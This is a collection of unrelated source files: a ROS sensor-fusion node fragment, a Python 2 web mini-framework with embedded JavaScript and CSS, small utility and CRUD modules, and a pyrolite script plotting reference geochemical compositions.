uncertainty_vector = np.zeros((num_states,1))
uncertainty_vector[next_index_unc*NUM_OWNSHIP_STATES:(next_index_unc+1)*NUM_OWNSHIP_STATES] = uncertainty_unknown_starting_position
uncertainty += np.eye(num_states) * uncertainty_vector
next_index_unc += 1
return state_vector, uncertainty
def get_process_noise(num_states, blue_team_names):
Q = np.zeros((num_states, num_states))
ownship_Q = _dict2arr(rospy.get_param("~process_noise/ownship"))
blueteam_Q = _dict2arr(rospy.get_param("~process_noise/blueteam"))
redteam_Q = _dict2arr(rospy.get_param("~process_noise/redteam"))
Q_vec = np.zeros((num_states,1))
Q_vec[:NUM_OWNSHIP_STATES] = ownship_Q
Q += np.eye(num_states) * Q_vec
my_name = rospy.get_param("~my_name")
red_team_names = rospy.get_param("~red_team_names")
next_index = 1
for asset in blue_team_names:
if asset == my_name:
continue
Q_vec = np.zeros((num_states,1))
Q_vec[next_index*NUM_OWNSHIP_STATES:(next_index+1)*NUM_OWNSHIP_STATES] = blueteam_Q
Q += np.eye(num_states) * Q_vec
next_index += 1
for asset in red_team_names:
Q_vec = np.zeros((num_states,1))
Q_vec[next_index*NUM_OWNSHIP_STATES:(next_index+1)*NUM_OWNSHIP_STATES] = redteam_Q
Q += np.eye(num_states) * Q_vec
next_index += 1
return Q
def get_default_meas_variance():
meas_vars = {}
meas_info = rospy.get_param("~measurements")
for meas in meas_info.keys():
sd = meas_info[meas]["default_sd"]
meas_vars[meas] = sd ** 2
return meas_vars
if __name__ == "__main__":
rospy.init_node("etddf_node")
my_name = rospy.get_param("~my_name")
update_rate = rospy.get_param("~update_rate")
delta_tiers = rospy.get_param("~delta_tiers")
blue_team_names = rospy.get_param("~blue_team_names")
blue_team_positions = rospy.get_param("~blue_team_positions")
# Don't track surface if it isn't this agent
if my_name != "surface":
ind = blue_team_names.index("surface")
if ind >= 0:
blue_team_names.pop(ind)
blue_team_positions.pop(ind)
asset2id = get_indices_from_asset_names(blue_team_names)
delta_codebook_table = get_delta_codebook_table()
buffer_size = rospy.get_param("~buffer_space/capacity")
meas_space_table = get_meas_space_table()
missed_meas_tolerance_table = get_missed_meas_tolerance_table()
if my_name != "surface":
num_assets = len(asset2id) - 1 # subtract surface
else:
num_assets = len(asset2id)
x0, P0 = get_initial_estimate(num_assets * NUM_OWNSHIP_STATES, blue_team_names, blue_team_positions)
Q = get_process_noise(num_assets * NUM_OWNSHIP_STATES, blue_team_names)
rospy.logwarn("{}, {}, {}, {}".format(my_name, x0.shape, P0.shape, Q.shape))
default_meas_variance = get_default_meas_variance()
use_control_input = rospy.get_param("~use_control_input")
et_node = ETDDF_Node(my_name,
update_rate, \
delta_tiers, \
asset2id, \
delta_codebook_table, \
buffer_size, \
meas_space_table, \
missed_meas_tolerance_table, \
x0,\
P0,\
Q,\
default_meas_variance,\
use_control_input)
rospy.spin() | StarcoderdataPython |
1704397 | # -*- coding: utf-8 -*-
from string import Template
showfun = '''
<li class= "optitem" width="100%%">
<div style="float: left; width: 20px"> </div>
<a onclick="server.spring()" python="%s" href="#" width="100%%">%s</a>
</li>
'''
#hr = '''<HR>'''
jsonlib = r'''
if (!this.JSON) {
this.JSON = {};
}
(function () {
"use strict";
function f(n) {
// Format integers to have at least two digits.
return n < 10 ? '0' + n : n;
}
if (typeof Date.prototype.toJSON !== 'function') {
Date.prototype.toJSON = function (key) {
return isFinite(this.valueOf()) ?
this.getUTCFullYear() + '-' +
f(this.getUTCMonth() + 1) + '-' +
f(this.getUTCDate()) + 'T' +
f(this.getUTCHours()) + ':' +
f(this.getUTCMinutes()) + ':' +
f(this.getUTCSeconds()) + 'Z' : null;
};
String.prototype.toJSON =
Number.prototype.toJSON =
Boolean.prototype.toJSON = function (key) {
return this.valueOf();
};
}
var cx = /[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,
escapable = /[\\\"\x00-\x1f\x7f-\x9f\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,
gap,
indent,
meta = { // table of character substitutions
'\b': '\\b',
'\t': '\\t',
'\n': '\\n',
'\f': '\\f',
'\r': '\\r',
'"' : '\\"',
'\\': '\\\\'
},
rep;
function quote(string) {
// If the string contains no control characters, no quote characters, and no
// backslash characters, then we can safely slap some quotes around it.
// Otherwise we must also replace the offending characters with safe escape
// sequences.
escapable.lastIndex = 0;
return escapable.test(string) ?
'"' + string.replace(escapable, function (a) {
var c = meta[a];
return typeof c === 'string' ? c :
'\\u' + ('0000' + a.charCodeAt(0).toString(16)).slice(-4);
}) + '"' :
'"' + string + '"';
}
function str(key, holder) {
// Produce a string from holder[key].
var i, // The loop counter.
k, // The member key.
v, // The member value.
length,
mind = gap,
partial,
value = holder[key];
// If the value has a toJSON method, call it to obtain a replacement value.
if (value && typeof value === 'object' &&
typeof value.toJSON === 'function') {
value = value.toJSON(key);
}
// If we were called with a replacer function, then call the replacer to
// obtain a replacement value.
if (typeof rep === 'function') {
value = rep.call(holder, key, value);
}
// What happens next depends on the value's type.
switch (typeof value) {
case 'string':
return quote(value);
case 'number':
// JSON numbers must be finite. Encode non-finite numbers as null.
return isFinite(value) ? String(value) : 'null';
case 'boolean':
case 'null':
// If the value is a boolean or null, convert it to a string. Note:
// typeof null does not produce 'null'. The case is included here in
// the remote chance that this gets fixed someday.
return String(value);
// If the type is 'object', we might be dealing with an object or an array or
// null.
case 'object':
// Due to a specification blunder in ECMAScript, typeof null is 'object',
// so watch out for that case.
if (!value) {
return 'null';
}
// Make an array to hold the partial results of stringifying this object value.
gap += indent;
partial = [];
// Is the value an array?
if (Object.prototype.toString.apply(value) === '[object Array]') {
// The value is an array. Stringify every element. Use null as a placeholder
// for non-JSON values.
length = value.length;
for (i = 0; i < length; i += 1) {
partial[i] = str(i, value) || 'null';
}
// Join all of the elements together, separated with commas, and wrap them in
// brackets.
v = partial.length === 0 ? '[]' :
gap ? '[\n' + gap +
partial.join(',\n' + gap) + '\n' +
mind + ']' :
'[' + partial.join(',') + ']';
gap = mind;
return v;
}
// If the replacer is an array, use it to select the members to be stringified.
if (rep && typeof rep === 'object') {
length = rep.length;
for (i = 0; i < length; i += 1) {
k = rep[i];
if (typeof k === 'string') {
v = str(k, value);
if (v) {
partial.push(quote(k) + (gap ? ': ' : ':') + v);
}
}
}
} else {
// Otherwise, iterate through all of the keys in the object.
for (k in value) {
if (Object.hasOwnProperty.call(value, k)) {
v = str(k, value);
if (v) {
partial.push(quote(k) + (gap ? ': ' : ':') + v);
}
}
}
}
// Join all of the member texts together, separated with commas,
// and wrap them in braces.
v = partial.length === 0 ? '{}' :
gap ? '{\n' + gap + partial.join(',\n' + gap) + '\n' +
mind + '}' : '{' + partial.join(',') + '}';
gap = mind;
return v;
}
}
// If the JSON object does not yet have a stringify method, give it one.
if (typeof JSON.stringify !== 'function') {
JSON.stringify = function (value, replacer, space) {
// The stringify method takes a value and an optional replacer, and an optional
// space parameter, and returns a JSON text. The replacer can be a function
// that can replace values, or an array of strings that will select the keys.
// A default replacer method can be provided. Use of the space parameter can
// produce text that is more easily readable.
var i;
gap = '';
indent = '';
// If the space parameter is a number, make an indent string containing that
// many spaces.
if (typeof space === 'number') {
for (i = 0; i < space; i += 1) {
indent += ' ';
}
// If the space parameter is a string, it will be used as the indent string.
} else if (typeof space === 'string') {
indent = space;
}
// If there is a replacer, it must be a function or an array.
// Otherwise, throw an error.
rep = replacer;
if (replacer && typeof replacer !== 'function' &&
(typeof replacer !== 'object' ||
typeof replacer.length !== 'number')) {
throw new Error('JSON.stringify');
}
// Make a fake root object containing our value under the key of ''.
// Return the result of stringifying the value.
return str('', {'': value});
};
}
// If the JSON object does not yet have a parse method, give it one.
if (typeof JSON.parse !== 'function') {
JSON.parse = function (text, reviver) {
// The parse method takes a text and an optional reviver function, and returns
// a JavaScript value if the text is a valid JSON text.
var j;
function walk(holder, key) {
// The walk method is used to recursively walk the resulting structure so
// that modifications can be made.
var k, v, value = holder[key];
if (value && typeof value === 'object') {
for (k in value) {
if (Object.hasOwnProperty.call(value, k)) {
v = walk(value, k);
if (v !== undefined) {
value[k] = v;
} else {
delete value[k];
}
}
}
}
return reviver.call(holder, key, value);
}
// Parsing happens in four stages. In the first stage, we replace certain
// Unicode characters with escape sequences. JavaScript handles many characters
// incorrectly, either silently deleting them, or treating them as line endings.
text = String(text);
cx.lastIndex = 0;
if (cx.test(text)) {
text = text.replace(cx, function (a) {
return '\\u' +
('0000' + a.charCodeAt(0).toString(16)).slice(-4);
});
}
// In the second stage, we run the text against regular expressions that look
// for non-JSON patterns. We are especially concerned with '()' and 'new'
// because they can cause invocation, and '=' because it can cause mutation.
// But just to be safe, we want to reject all unexpected forms.
// We split the second stage into 4 regexp operations in order to work around
// crippling inefficiencies in IE's and Safari's regexp engines. First we
// replace the JSON backslash pairs with '@' (a non-JSON character). Second, we
// replace all simple value tokens with ']' characters. Third, we delete all
// open brackets that follow a colon or comma or that begin the text. Finally,
// we look to see that the remaining characters are only whitespace or ']' or
// ',' or ':' or '{' or '}'. If that is so, then the text is safe for eval.
if (/^[\],:{}\s]*$/
.test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')
.replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g, ']')
.replace(/(?:^|:|,)(?:\s*\[)+/g, ''))) {
// In the third stage we use the eval function to compile the text into a
// JavaScript structure. The '{' operator is subject to a syntactic ambiguity
// in JavaScript: it can begin a block or an object literal. We wrap the text
// in parens to eliminate the ambiguity.
j = eval('(' + text + ')');
// In the optional fourth stage, we recursively walk the new structure, passing
// each name/value pair to a reviver function for possible transformation.
return typeof reviver === 'function' ?
walk({'': j}, '') : j;
}
// If the text is not JSON parseable, then a SyntaxError is thrown.
throw new SyntaxError('JSON.parse');
};
}
}());
'''
maincss = r'''
body {
font: 90% Arial, Verdana, Helvetica, sans-serif;
height: 100%;
background: #FFFFFF;
margin: 0;
padding: 0;
text-align: center;
color: #000000;
}
.twoColHybLt #toptip {
position:absolute;
z-index:100;
}
.twoColHybLt #main_toolbar {
width: auto;
text-align: right;
margin: 0;
border-bottom: 1px solid #C2CFF1;
overflow:auto;
height: 20px;
}
.twoColHybLt #main_title h3 {
margin: 0;
}
.twoColHybLt #main_title {
font: 120% Arial;
width: auto;
text-align: left;
margin: 0;
overflow:auto;
height: 40px;
}
.twoColHybLt #container {
width: auto;
border: 0px none #000000;
text-align: left;
margin-top: 0;
margin-right: 0px;
margin-bottom: 0;
margin-left: 0px;
overflow:auto;
}
.twoColHybLt #sidebar {
float: left;
width: 18em;
padding-right: 0;
padding-left: 0;
overflow: auto;
}
.twoColHybLt #splitbar {
float: left;
width: 8px;
background: #EBEFF9;
padding-right: 0;
padding-left: 0;
overflow: auto;
border-left: 1px solid #C2CFF1;
}
.twoColHybLt #splitbar:hover {
background: #C2CFF1;
}
.twoColHybLt #sidebar h3,
.twoColHybLt #sidebar p {
margin-left: 10px;
margin-right: 10px;
}
.twoColHybLt #mainContent {
margin: 0 0 0 13em;
}
#mainContent #tabcontent {
overflow: auto;
}
.twoColHybLt #topbar {
font: 170% arial;
width: auto;
height: 30px;
background: #C2CFF1;
overflow: auto;
padding: 5px 15px 0 10px;
}
#topnav {
float: left;
}
#topmenu {
float: right;
}
#toptitle {
width: auto;
}
#switch_argbar {
font: 50% arial;
color: #0000CC;
float: right;
position: relative;
top: 5px;
}
.twoColHybLt #argbar {
font: 120% arial;
width: auto;
height: auto !important; height: 30px; min-height: 30px;
text-align: left;
background: #EBEFF9;
border-bottom: 1px solid #C2CFF1;
overflow: auto;
padding: 0 10px 0 10px;
}
#argbar dl .first {
border-top: 0;
}
#argbar dl {
padding: 0px 10px 0px 10px;
border-top: 1px dashed #C2CFF1;
overflow: hidden;
margin: 0;
}
#argbar dt {
float: left;
width: 60px;
font-weight: bold;
text-align: right;
padding: 2px 0 0 0;
}
#argbar dd {
overflow: auto;
width: auto;
padding: 0 0 0 20px;
}
#argbar dd div {
font: 60% arial;
float: left;
width: 100px;
height: 20px;
border: 3px solid #B6CDDC;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
border-radius: 5px;
margin: 0 10px 1px 0;
}
#argbar dd div:hover {
background: white;
}
#argbar dd select {
min-width: 220px;
height: 26px;
border: 3px solid #B6CDDC;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
border-radius: 5px;
background: #EBEFF9;
}
#argbar dd select:hover {
background: white;
}
#argbar dd input[type=text] {
min-width: 220px;
height: 20px;
border: 3px solid #B6CDDC;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
border-radius: 5px;
background: #EBEFF9;
}
#argbar dd input[type=text]:hover {
background: white;
}
.twoColHybLt #contentzone {
overflow: scroll;
}
.opts {
padding: 5px 0px 5px 0px;
margin: 0;
border-top: 1px solid #C2CFF1;
}
.opts span {
padding-left: 5px;
margin-bottom: 25px;
font-weight: bold;
}
.optitem {
list-style-type:none;
padding-right: 0;
padding-left: 0;
}
.optitem:hover{
background: #FFFFAA;
}
.optitem a {
text-decoration: none;
color: #3f3f3f;
}
.fltrt {
float: right;
margin-left: 8px;
}
.fltlft {
float: left;
margin-right: 8px;
}
.clearfloat {
clear:both;
height: 100%;
font-size: 1px;
line-height: 0px;
}
html {
height:100%;
}
'''
maincss = maincss + '''
.ep-table {
padding: 0;
margin: 0;
}
caption {
padding: 0 0 5px 0;
width: 700px;
font: italic 11px "Trebuchet MS", Verdana, Arial, Helvetica, sans-serif;
text-align: right;
}
th {
font: bold 11px "Trebuchet MS", Verdana, Arial, Helvetica, sans-serif;
color: #4f6b72;
border-right: 1px solid #C1DAD7;
border-bottom: 1px solid #C1DAD7;
border-top: 1px solid #C1DAD7;
letter-spacing: 2px;
text-align: left;
padding: 6px 6px 6px 12px;
background: #CAE8EA;
width: 30px;
}
th.nobg {
border-top: 0;
border-left: 0;
border-right: 1px solid #C1DAD7;
background: none;
}
td {
border-right: 1px solid #C1DAD7;
border-bottom: 1px solid #C1DAD7;
background: #fff;
padding: 6px 6px 6px 12px;
color: #4f6b72;
}
td.alt {
background: #F5FAFA;
color: #797268;
}
th.spec {
border-left: 1px solid #C1DAD7;
border-top: 0;
background: #fff;
font: bold 10px "Trebuchet MS", Verdana, Arial, Helvetica, sans-serif;
}
th.specalt {
border-left: 1px solid #C1DAD7;
border-top: 0;
background: #f5fafa url(images/bullet2.gif) no-repeat;
font: bold 10px "Trebuchet MS", Verdana, Arial, Helvetica, sans-serif;
color: #797268;
}
.ep-bar {
height: 100%;
_position: relative;
margin: 0 auto;
padding: 1px 1px 1px 1px;
}
.ep-bar-in {
height: 100%;
background-color: #B1D632;
position: relative;
display: table;
}
.ep-bar-iin{
_position: absolute;
_top: 50%;
vertical-align: middle;
display: table-cell;
}
.ep-bar-iiin {
_position: relative;
width: 100%;
height: 100%;
_top: -50%;
}
.ep-number {
white-space: nowrap;
}
'''
ajaxlib = r'''
function Server() {
this.url = document.URL;
try {
this.conn = new XMLHttpRequest();
} catch(exp) {
this.conn = new ActiveXObject("MSXML2.XMLHTTP.3.0");
};
this.resizecontainzone = function()
{
function $(id){
return window.document.getElementById(id);
}
var h = document.getElementById( "mainContent" ).offsetHeight;
h = h - document.getElementById( "topbar" ).offsetHeight;
h = h - document.getElementById( "argbar" ).offsetHeight;
$("contentzone").style.height = h + "px";
};
this.conn.onreadystatechange = function()
{
if( this.readyState == 4 )
{
if ( this.status == "200" )
{
eval( this.responseText ) ;
function $(id){
return window.document.getElementById(id);
}
var h = document.getElementById( "mainContent" ).offsetHeight;
h = h - document.getElementById( "topbar" ).offsetHeight;
h = h - document.getElementById( "argbar" ).offsetHeight;
$("contentzone").style.height = h + "px";
tip = document.getElementById("toptip") ;
tip.style.display = "none" ;
}
else
{
tip = document.getElementById("toptip") ;
tip.style.display = "none" ;
tip.innerHTML = "error catched : " + this.status ;
tip.style.display = "" ;
}
}
};
this.ajaxcall = function( content, info ) {
ajaxurl = this.url;
if ( info != null )
{
tip = document.getElementById("toptip") ;
tip.style.display = "none" ;
tip.innerHTML = info ;
tip.style.display = "" ;
}
content = JSON.stringify(content);
this.conn.open( "POST" , ajaxurl , true );
this.conn.setRequestHeader("Content-Length", content.length);
this.conn.send( content );
};
this.onload = function() {
var content = { id:null, event:"onload", python:"",
uri:document.URL };
this.ajaxcall( content, "loading page..." );
};
this.spring = function() {
var ev = window.event || arguments.callee.caller.arguments[0];
var target = ev.srcElement || ev.target;
var python = target.getAttribute("python");
if( python == null ) {
python = "";
}
var content = { id:target.id, event:ev.type, python:python,
uri:document.URL };
this.ajaxcall( content, "loading page..." );
};
this.ontimer = function() {
var d = document.getElementById( this.id );
if ( d === undefined || d == null ) {
this.removetimer();
return;
}
var content = { id:this.id, event:"timer", python:this.info,
uri:document.URL };
this.ajaxcall( content, null );
};
this.settimer = function(info, id) {
this.info = info;
this.id = id;
var _this = this;
this.timer = setInterval(function(){_this.ontimer();}, 2000 );
};
this.removetimer = function() {
clearInterval(this.timer);
};
};
var server = new Server();
'''
jsothers = r'''
window.onload = function(){
resize();
server.onload();
};
window.onresize = resize;
function $(id){
return window.document.getElementById(id);
}
function resize(){
var doc = window.document;
var h = Math.max(doc.body.offsetHeight, doc.documentElement.offsetHeight);
h = h - document.getElementById( "main_toolbar" ).offsetHeight;
h = h - document.getElementById( "main_title" ).offsetHeight;
$("container").style.height = h + "px";
$("sidebar").style.height = h + "px";
$("splitbar").style.height = h + "px";
$("mainContent").style.height = h + "px";
server.resizecontainzone()
doc = null;
}
function hidesidebar() {
if (this.visibale)
{
$("sidebar").style.display = "none";
//$("mainContent").style.width = "100%";
$("topnav").style.display = "block";
this.visibale = 0;
//resize();
}
else
{
//$("mainContent").style.width = "auto";
$("sidebar").style.display = "block";
$("topnav").style.display = "none";
this.visibale = 1;
//resize();
}
}
hidesidebar.visibale = 1;
function hideargbar() {
if (this.visibale)
{
$("argbar").style.display = "none";
$("switch_argbar").innerHTML = "显示参数栏";
this.visibale = 0;
resize();
}
else
{
$("argbar").style.display = "block";
$("switch_argbar").innerHTML = "隐藏参数栏";
this.visibale = 1;
resize();
}
}
hideargbar.visibale = 1;
'''
mainhtml = r'''
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Monitor</title>
<style type="text/css">
$maincss
</style>
<!--[if IE]>
<style type="text/css">
.twoColHybLt #sidebar { padding-top: 30px; }
.twoColHybLt #mainContent { zoom: 1; padding-top: 15px; }
</style>
<![endif]-->
<script type="text/javascript">
$ajaxlib
</script>
<script type="text/javascript">
$jsothers
</script>
</head>
<body class="twoColHybLt">
<div id="toptip" style="display:none;">A</div>
<div id="main_toolbar">
Login
</div>
<div id="main_title">
<h3>$title</h3>
</div>
<div id="container">
<div id="sidebar">
$funclist
</div>
<div id="splitbar" onclick="hidesidebar()"></div>
<div id="mainContent">
<div id="topbar" >
<div id="topnav" style="display:none;" >
<input type="button" value="导航" />
</div>
<div id="topmenu">
<input type="button" value="提交/刷新" />
</div>
<div id="switch_argbar" onclick="hideargbar()">隐藏参数栏</div>
<div id="toptitle"></div>
</div>
<div id="argbar" ></div>
<div id="contentzone" ></div>
</div>
</div>
</body>
</html>
'''
mainhtml = Template(mainhtml)
from Al import easydoc
from Al.__furture__ import easyprint as eprint
import json
from pprint import pprint
from urlparse import urlparse
import xml.sax.saxutils
class EasyWeb( object ):
def __init__( self, title = None ):
self.title = title or "EasyWeb"
self.methods = dict( ( k[4:], getattr( self, k ) ) for k in dir(self)
if k.startswith('web_') )
self.respmakers = dict( ( k[5:], getattr( self, k ) ) for k in dir(self)
if k.startswith('resp_') )
self.methods[''] = self._web_default
self.methods[None] = self.main_page
self.methods_meta = dict( ( k, easydoc.parse( v.__doc__, 'object_ex' ) )
for k, v in self.methods.items() )
#pprint( self.methods_meta )
self.mp = self.make_mainpage()
def make_mainpage( self ):
'''
'''
funclist = [ ( k, v.get( 'name', k), v.get('group', '') )
for k, v in self.methods_meta.items() if k ]
grps = set( g for f, n, g in funclist )
funclist = [ '\n'.join(
[ showfun % (f, n) for f, n, _g in funclist if _g == g ]
) for g in grps ]
grps = [ ( ( '<span>' + g + '</span>\n' ) if g else '' )
for g in grps ]
funclist = [ '<ul class="opts">' + g + fl + '</ul>'
for g , fl in zip( grps, funclist ) ]
funclist = '\n'.join(funclist)
#return mainhtml % ( 'Monitor', funlist )
return mainhtml.safe_substitute( title = self.title,
funclist = funclist,
jsothers = jsothers,
ajaxlib = ajaxlib,
maincss = maincss,
)
def run( self, env, start_response ):
uri = env['PATH_INFO']
qs = env['QUERY_STRING']
work_n = None
args = []
if env['REQUEST_METHOD'] == 'GET' :
page = uri.split('#',1)[0]
if page != '/' :
start_response( '404 NOT FOUND', [] )
#yield resp.get( 'body', '' )
return
elif env['REQUEST_METHOD'] == 'POST' :
clen = int(env['CONTENT_LENGTH'])
req = json.loads( env['wsgi.input'].read(clen) )
if req['event'] == 'onload' :
page = ( uri.split('#',1)+[''] )[1] if 'uri' not in req else \
urlparse(req['uri']).fragment
print page
if page != '' :
page = page.split('/')
work_n, args = page[0], page[1:]
#work = self.methods[work_n]
else :
work_n = ''
else :
work_n = req['python']
args = []
else :
raise Exception, 'not supported'
work = self.methods[work_n]
rtmk = self.respmakers[ self.methods_meta[work_n]['showtype'] ]
resp = rtmk( work( None, *args ) )
start_response( '200 OK', [] )
yield resp
if work_n is None :
return
yield '''document.getElementById('toptitle').innerHTML = '%s';''' \
% ( str(self.methods_meta[work_n].get('name', work_n )), )
if req['event'] == 'onload' :
return
yield '''window.location.href=window.location.href+"%s";''' \
%( str(work_n), )
showargs = self.methods_meta[work_n].get( "arguments", {} )
showargs = self.make_args( showargs )
yield '''document.getElementById('argbar').innerHTML = '%s';''' \
% ( showargs.encode('string_escape'), )
def make_args( self, args ):
r = [ getattr(self,'arg_'+v[''] )( k, v ) for k, v in args.items() ]
r = [ '<dl>\n<dt>%s</dt><dd>%s\n</dd></dl>' % ( k, i )
for k, i in zip(args.keys(), r)]
r = '\n'.join(r)
return r
def arg_dropdownlist( self, name, arg ):
items = eval( arg['items'] )
default = eval( arg.get( 'default','None') )
r = [ '<option value="%s" %s >%s</option>' \
% ( i, 'selected="selected"' if i == default else '', i)
for i in items ]
r = '\n'.join(r)
r = ( '<select name="%s">\n' % (name,) ) + r + '\n</select>'
return r
def arg_selectlist( self, name, arg ):
items = eval( arg['items'] )
_its = [ ( name+'_'+str(idx), i ) for idx, i in enumerate(items) ]
r = [ '<div><input type="checkbox" id="%s" name="%s" value="%s" /><label for="%s">%s</lable></div>' \
% ( idx, name, i, idx, i )
for idx, i in _its ]
r = '\n'.join(r)
#r = ( '<dl>\n<dt>%s</dt><dd>' % (name,) ) + r + '\n</dd></dl>'
return r
def arg_text( self, name, arg ):
default = eval( arg.get( 'default','""') )
r = '<input type="text" name="%s" value="%s" />' % ( name, default)
return r
def serve( self, port, engine = '' ):
if engine == '' :
from wsgiref.simple_server import make_server
httpd = make_server( '', port, self.run )
print "Serving HTTP on port %d..." % ( port, )
# Respond to requests until process is killed
httpd.serve_forever()
return
elif engine == 'flup.fastcgi' :
from flup.server.fcgi_fork import WSGIServer
# Respond to requests until process is killed
WSGIServer( wflow.run , bindAddress=port ).run()
return
raise Exception, 'unsupported engine.'
def main_page( self, user ):
'''
showtype: html
'''
return self.mp
def _web_default( self, user ):
'''
showtype: text
'''
return "hello world"
def resp_html( self, r ):
return r
def resp_raw( self, r ):
if type(r) == type(u''):
r = r.encode('utf-8')
if type(r) != type(''):
r = str(r)
return '''document.getElementById('contentzone').innerHTML = '%s';''' \
% ( r.encode('string_escape'), )
def resp_text( self, r ):
if type(r) == type(u''):
r = r.encoding('utf-8')
if type(r) != type(''):
r = str(r)
r = xml.sax.saxutils.escape(r)
return '''document.getElementById('contentzone').innerHTML = '%s';''' \
% ( r.encode('string_escape'), )
def resp_table( self, r ):
r = eprint.Table( r, attr={"cellSpacing":0} ).htmlformat()
return self.resp_raw(r)
class EasyWebTest( EasyWeb ):
def web_test( self, user ):
'''
arguments:
input1: dropdownlist
items: ['table','list']
default: 'table'
input2: text
default: 'hello'
input3: selectlist
items: [1,2,3,4,5,6,7,8,9]
showtype: text
'''
return
def web_test2( self, user ):
'''
showtype: table
name: hello world
group: Hello
'''
d = [ { 'colA' : 'A.1.alpha\r\nA.1.beta' ,
'colB' : [1,2],
'colC' : 'B.1.alpha\r\nB.1.beta\r\nB.1.gamma\r\nB.1.delta',
},
{ 'colA' : 'A.2.alpha\r\nA.2.beta' ,
'colB' : [0.1,0.9,0.3,0,-1],
'colC' : [3,0.7,{'B.2.alpha':'z','B.1':'qew' },True,False],
},
]
return d
def web_test3( self, user ):
'''
showtype: text
name: sleep 1 sec
group: Hello
'''
import time
time.sleep(1)
return 'server sleeped 1 sec'
if __name__ == '__main__' :
t = EasyWebTest()
#print t.methods
t.serve(1088)
| StarcoderdataPython |
1618444 | # -*- coding:utf-8 -*-
# Create by 27
# @Time : 2020/3/1 02:23
__author__ = '27'
class NoneLocal:
def __init__(self, v):
self.v = v
n = NoneLocal(1)
| StarcoderdataPython |
1746803 | <filename>sztuczna_inteligencja/1-lab/picture_row.py
def howManyHaveToFlip(list, windowSize):
oneSymbol = 1
leastFlips = len(list)
OnesInList = 0
for x in list:
if x == oneSymbol:
OnesInList += 1
OnesInWindow = 0
for i in range(windowSize):
if list[i] == oneSymbol:
OnesInWindow += 1
for i in range(len(list) - windowSize - 1):
leastFlips = min(
(windowSize - OnesInWindow) + (OnesInList - OnesInWindow),
leastFlips
)
if list[i] == oneSymbol:
OnesInWindow -= 1
if list[i + windowSize] == oneSymbol:
OnesInWindow += 1
return leastFlips
| StarcoderdataPython |
1621248 | <gh_stars>1-10
from . import (pp, Session)
from ..db.database import get_db
from .base import CRUDBase
from ..models.models_patch import Patch
from ..schemas.schemas_patch import PatchCreate, PatchUpdate
class CRUDPatch(CRUDBase[Patch, PatchCreate, PatchUpdate]):
pass
patch = CRUDPatch(Patch)
| StarcoderdataPython |
108123 | <filename>backend/app/utils/get_param.py
from flask_restful import request, abort
def get_param(param_name, default, is_valid, to_value, error_message):
param_string = request.args.get(param_name)
if param_string is None:
param_string = default
elif not is_valid(param_string):
abort(400, message=error_message)
return to_value(param_string)
def get_string_param(param_name: str, default: str,
valid_words: list[str] = None) -> str:
"""Get query parameter in form of string.
Args:
param_name (str): Name of parameter.
default (str): Default value of parameter.
valid_words (list[str]): List of valid strings.
"""
def is_valid(string): return True
if valid_words is not None:
is_valid = valid_words.__contains__
def to_value(string): return string
error_message = 'problem with query'
if valid_words is not None:
error_message = f'{param_name} should be: ' + ', '.join(valid_words)
return get_param(param_name, default, is_valid, to_value, error_message)
def get_bool_param(param_name: str, default: bool) -> bool:
"""Get query parameter in form of boolean.
Args:
param_name (str): Name of parameter.
default (bool): Default value of parameter.
"""
default = str(default).lower()
is_valid = ['true', 'false'].__contains__
def to_value(string): return string == "true"
error_message = f'{param_name} should be "true" or "false"'
return get_param(param_name, default, is_valid, to_value, error_message)
def get_int_param(param_name: str, default: int) -> int:
"""Get query parameter in form of integer.
Args:
param_name (str): Name of parameter.
default (int): Default value of parameter.
"""
default = str(default)
is_valid = str.isdigit
to_value = int
error_message = f'{param_name} should be an integer'
return get_param(param_name, default, is_valid, to_value, error_message) | StarcoderdataPython |
1720235 | <gh_stars>10-100
"""
Reference Compositions
=======================
This page presents the range of compositions within the reference compositon database
accessible within :mod:`pyrolite`. It's currently a work in progress, but will soon
contain extended descriptions and notes for some of the compositions and associated
references.
"""
import matplotlib.pyplot as plt
from pyrolite.geochem.norm import all_reference_compositions, get_reference_composition
# sphinx_gallery_thumbnail_number = 11
refcomps = all_reference_compositions()
norm = "Chondrite_PON" # a constant composition to normalise to
########################################################################################
# Chondrites
# -----------
#
fltr = lambda c: c.reservoir == "Chondrite"
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
# Mantle
# -------
#
# Primitive Mantle & Pyrolite
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
fltr = lambda c: c.reservoir in ["PrimitiveMantle", "BSE"]
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
# Depleted Mantle
# ~~~~~~~~~~~~~~~~
#
fltr = lambda c: ("Depleted" in c.reservoir) & ("Mantle" in c.reservoir)
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
fig, ax = plt.subplots(1)
for composition in compositions:
composition.set_units("ppm")
df = composition.comp.pyrochem.normalize_to(norm, units="ppm")
df.pyroplot.REE(unity_line=True, ax=ax, label=composition.name)
ax.legend()
plt.show()
########################################################################################
# Mid-Ocean Ridge Basalts (MORB)
# -------------------------------
#
#
# Average MORB, NMORB
# ~~~~~~~~~~~~~~~~~~~~~
#
fltr = lambda c: c.reservoir in ["MORB", "NMORB"]
compositions = [x for (name, x) in refcomps.items() if fltr(x)]
